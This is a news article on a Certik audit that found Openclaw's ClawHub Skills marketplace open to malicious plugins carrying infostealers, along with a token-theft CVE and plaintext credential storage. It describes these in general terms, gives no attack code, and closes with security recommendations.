Openclaw AI Under Threat from Malicious Skills Exploits
Researchers from Certik have uncovered serious security vulnerabilities in the Openclaw AI platform, specifically in its third-party “Skills” marketplace, revealing that these weaknesses could facilitate malicious exploits. This alarming finding highlights the urgent need for improved security measures to protect users from potential attacks that could lead to data theft or unauthorized actions.
The security audit conducted by Certik focused on Openclaw’s ClawHub marketplace and its skill scanning system. In a proof-of-concept attack, analysts demonstrated how a seemingly legitimate Skill could circumvent the platform’s three-layer evaluation process, which includes VirusTotal scanning, static code analysis, and AI logic assessment. This exploitation leveraged code obfuscation techniques to carry out high-privilege code execution on user devices without triggering any alerts during the scans. Such vulnerabilities reflect a misunderstanding across the industry about the effectiveness of static pre-listing reviews, which are inadequate without stringent runtime isolation alongside granular permission controls that could restrict Skill permissions.
Escalating Threats from Malicious Skills
The threat landscape appears increasingly dire for Openclaw, with reports indicating that over 230 fraudulent Skills masquerading as legitimate applications, such as crypto trading tools and social media management solutions, currently exist within the ClawHub and GitHub environments. Many of these counterfeit Skills harbor infostealers including malware variants like AMOS, RedLine, Lumma, and Vidar, with their deployment remaining alarmingly simple—with open upload access for all users.
In addition, vulnerabilities such as CVE-2026-25253 have previously allowed token theft, leading to gateway compromises via malicious links. While timely patches were issued for such issues, the fact remains that configurations are plagued by inadequate data protection measures, including the plaintext storage of API keys and passwords, which are susceptible to injection attacks. As noted by China’s Computer Emergency Response Team (CERT), these weak default settings, along with user errors, exacerbate the potential for data breaches. They advocated for approaches including container isolation, restricting public ports, and tightening authentication processes.
Recommendations for Improved Security
Analysts emphasize that vulnerabilities identified in Openclaw are not unique to this platform. Rather, they pose a challenge to the entire category of AI agent frameworks reliant on pre-listing checks. While Openclaw has acted quickly to patch certain weaknesses and enhance scanning capabilities, stakeholders argue that ongoing vigilance and improved runtime protections are essential to safeguarding users. As evident from the rising use of such AI platforms, including Tencent’s “Work Buddy,” security protocols must adapt to handle increased scrutiny and usage.
To enhance operational security, experts recommend users isolate Openclaw operations within non-production virtual machines and utilize throwaway credentials while limiting the installation of third-party plugins. These proactive measures could diminish exposure to potential exploits and bolster user protection.









